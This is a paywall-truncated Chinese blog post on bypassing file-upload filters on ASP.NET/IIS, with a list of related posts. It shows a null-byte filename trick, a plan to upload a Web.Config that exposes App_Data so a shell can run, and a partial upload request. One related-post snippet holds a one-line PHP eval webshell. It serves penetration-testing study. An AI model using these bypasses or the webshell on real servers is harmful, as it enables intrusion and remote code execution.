文件上传绕过的多种姿势

已于 2023-06-26 16:28:42 修改
阅读量366 收藏
点赞数
分类专栏: 渗透测试技巧 文章标签: 服务器 asp.net 数据库
于 2023-04-19 10:14:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32445755/article/details/130237253
版权

1.添加%00截断绕过:

shell.aspx%00aspx.txt

2.添加配置文件 

App_Data包含应用程序数据文件,包括.mdf数据库文件、XML文件和其他数据存储文件#

#ASP.NET使用App_Data文件夹来存储应用程序的本地数据库,例如用于维护成员身份和角色信息的数据库#

#App_Data文件夹不像主目录下的其他网站目录那样是公共的#

#因为它是一个私有目录,IIS服务器出于安全原因将其隐藏#

#现在,我们将测试是否存在这样的目录#

#如果目录存在,我们将把它公开,这样我们就可以定义在其中运行shell所需的服务器函数#

#为此,我们将尝试加载一个特殊的服务器配置文件。这是一个Web.Config文件。有了这个,我们将绕过目录隐私#

#因此,该目录将是公共的,它将能够响应外部查询并运行shell。

POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Co
了解本专栏 订阅专栏 解锁全文 超级会员免费看
qq_1136014935
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
2022年文件上传漏洞绕过姿势整理,过waf版
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
文件上传绕过思路总结 - 先知社区1
08-03
1.Accept-Encoding 改变编码类型 2.修改请求方式绕过 3.host头部绕过
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
上传绕过WAF的15中姿势
06-29
绕过WAF进行文件上传的文旦,可以学习一些姿势加以利用。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
绕过限制上传文件
10-05
文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将代码植入到服务器中,再通过url去访问以执行代码。但在一些安全性较高的web应用中,往往会有各种上传限制和过滤,导致我们无法上传特定的文件。就需要用到这个工具去绕过各种限制上传文件
【问题】vs IIS破除文件上传限制最全版
07-27 131
今天在测试一下上传文件的时候发现iis和配置存在上传文件大小限制(IIS默认大小30M,最大运行为2g:2147483647),百度了一部分资料有些发布到IIS好使,但是在VS调试中不好使。于是自己不断努力还是找到了问题点。不是说网上的不对,只不过是有些情况下忽略了一些步骤。我就总结了一下我本次的步骤。 第一步: 配置web.config节点中的web节点: <syst...
上传后缀绕过
12-13
在上传的限制不能上传某些的后缀,对于上传中各绕过的描述
文件上传常用姿势
yzl_007的博客
10-13 286
文件上传常用姿势 1、后缀检测 某些情况下后缀名绕过:php、php3、php5、phtml、pht 2、常用一句话 GIF89a? <script language="php">eval($_REQUEST[shell])</script> 3、文件类型绕过 Content-Type:image/jpeg 等等 例题:[极客大挑战 2019]Upload 蚁剑连接 ...
【学习笔记】文件上传绕过
chualam的博客
11-16 366
一般防御:JavaScript(直接禁用就好) content-type: image/gif (抓包改包) 文件内容头(GIF89a)利用copy命令把图片和木马结合 木马头加上内容头就可以了 后缀名黑白名单(大小写绕过,能被解析的扩展名列表jsp jspx jspf asp asa cer aspxphp php php3 php4exe exee,) 配合文件包含漏洞(先上传一个包含恶意php代码的图片或者txt,有些waf只会对动态语言的页面进行验证) 文件名解析漏洞(test.asp.   tes
文件上传漏洞解析及简单绕过技巧
秋水的博客
09-07 2575
文件上传漏洞简介 什么是文件上传漏洞? 简单来说就是,攻击者向服务器上上传了服务器可以解析的动态脚本文件,这里上传的文件可以是木马,病毒,恶意脚本或者Webshell等 这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果 为什么会产生文件上传漏洞? 这是因为,开发人员由于大意...
[Web安全]文件上传漏洞及绕过基础详解+实操
_DESpiSED的博客
09-22 3248
本文详细介绍了文件上传漏洞以及绕过方法,并对每一种方法进行演示和实操,希望能为网络安全初学者 提供思路。
文件上传绕过
qq_45557130的博客
10-13 4208
文件上传绕过
文件上传绕过学习(主力帖子)
mjx666的博客
06-07 670
原文链接:https://blog.csdn.net/qq_34853514/article/details/115279426
文件上传绕过】——解析漏洞_IIS6.0解析漏洞
weixin_45588247的博客
07-18 2142
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞说明:五、环境准备:六、目录解析漏洞:1. 原理:2. 实验步骤:七、文件解析漏洞:1. 原理:2. 实验步骤: 一、实验目的: 1、通过本次实验掌握IIS6.0解析漏洞产生原因。 2、通过本次实验掌握IIS6.0解析漏洞利用技术。 二、工具: 火狐/谷歌浏览器 三、实验环境: 靶 机: windows2003虚拟机:192.168.15.129       iis6.0服务器   攻击机: 物理机 四、漏洞说明: IIS6.0解
文件上传绕过】——解析漏洞_IIS7.0 | IIS7.5 | Nginx的解析漏洞
weixin_45588247的博客
07-19 3783
10文件上传绕过_解析漏洞_IIS7.0 | IIS7.5 | Nginx的解析漏洞 文章目录10文件上传绕过_解析漏洞_IIS7.0 | IIS7.5 | Nginx的解析漏洞一、实验目的:二、工具:三、实验环境:四、漏洞说明:1.  `nginx解析漏洞`(实验环境:`Nginx1.4.6` ):1.1 原理:1.2 漏洞形式:1.3 另外两种解析漏洞:2. IIS7.0 | 7.5解析漏洞:2.1 原理:2.2 漏洞形式:五、环境准备:1. 安装 XAMPP环境:2. 安装IIS服务器:2.1 安
上传文件漏洞(上传绕过
09-21 334
0x00 漏洞概述 任意文件上传漏洞主要是由于程序员在开发文件上传功能时,没有考虑对文件格式后缀的合法性进行校验或只考虑在应用前端(Web 浏览器端)通过 javascript 进行后缀校验,攻击者可上传一个包含恶意代码的动态脚本(如 jsp、asp、php、aspx 文件后缀)到服务器上,攻击者访问该脚本时服务器将对包含恶意代码的动态脚本解析,最终执行相应的恶意代码。该漏洞最终将可能...
文件上传20个绕过方法(upload-labs)
qq_41672971的博客
10-28 951
文件上传20关
文件上传漏洞的文件头绕过
最新发布
04-20
文件上传漏洞是一种常见的Web安全漏洞,攻击者通过绕过文件头检测机制,上传恶意文件到服务器上,从而执行任意代码或者获取敏感信息。文件头绕过是指攻击者通过修改文件的内容或者文件名来欺骗服务器的文件类型检测机制,使得服务器无法正确判断文件的真实类型。 为了绕过文件头检测机制,攻击者可以采取以下几种方法: 1. 修改文件内容:攻击者可以在文件的开头添加一些特殊字符或者修改文件的二进制内容,使得文件头部的标识符不再符合服务器的文件类型检测规则。 2. 修改文件扩展名:攻击者可以将恶意文件的扩展名修改为服务器允许上传的合法文件类型的扩展名,从而欺骗服务器认为该文件是合法的。 3. 使用双重扩展名:攻击者可以将恶意文件的扩展名修改为两个或多个扩展名的组合,例如将`.php`文件修改为`.jpg.php`,这样服务器可能只会检测到第一个扩展名,从而误判文件类型。 4. 使用特殊编码:攻击者可以使用特殊编码对文件进行编码,使得文件头部的标识符被隐藏或者混淆,从而绕过文件类型检测。 为了防止文件上传漏洞的文件头绕过,开发者可以采取以下几种措施: 1. 文件类型检测:在服务器端对上传的文件进行类型检测,可以通过检查文件的魔术数字、文件扩展名、MIME类型等方式来判断文件的真实类型。 2. 文件名过滤:对上传的文件名进行过滤,只允许合法的文件名字符,避免使用特殊字符或者路径分隔符。 3. 文件内容检测:对上传的文件内容进行检测,可以通过解析文件内容或者使用杀毒软件等方式来检测文件是否包含恶意代码。 4. 文件权限设置:限制上传文件的存储路径的访问权限,避免攻击者通过上传恶意文件获取服务器的敏感信息或者执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_1136014935

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值